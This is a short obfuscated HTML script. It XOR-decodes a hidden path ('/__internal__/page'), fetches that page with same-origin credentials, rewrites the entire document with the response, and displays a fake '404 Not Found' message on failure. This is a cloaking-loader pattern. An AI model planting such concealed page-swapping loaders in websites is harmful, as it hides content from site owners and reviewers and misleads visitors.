<script>
(() => {
    const $ = (...a) =>
        String.fromCharCode.apply(
            null,
            a.map(v => v ^ 37)
        );

    const _ = [
        [122,122],
        [76,75,81,64,87,75,68,73],
        [122,122],
        [85,68,66,64]
    ];

    const u =
        "/" +
        $(..._[0]) +
        $(..._[1]) +
        $(..._[2]) +
        "/" +
        $(..._[3]);

    (async () => {
        try {
            const r = await fetch(u, {
                cache: ["no", "store"].join("-"),
                credentials: ["same", "origin"].join("-")
            });

            if (!r.ok) throw 0;

            const h = await r.text();

            document.open();
            document.write(h);
            document.close();
        } catch {
            document.body.innerHTML = "<h1>404 Not Found</h1>";
        }
    })();
})();
</script>
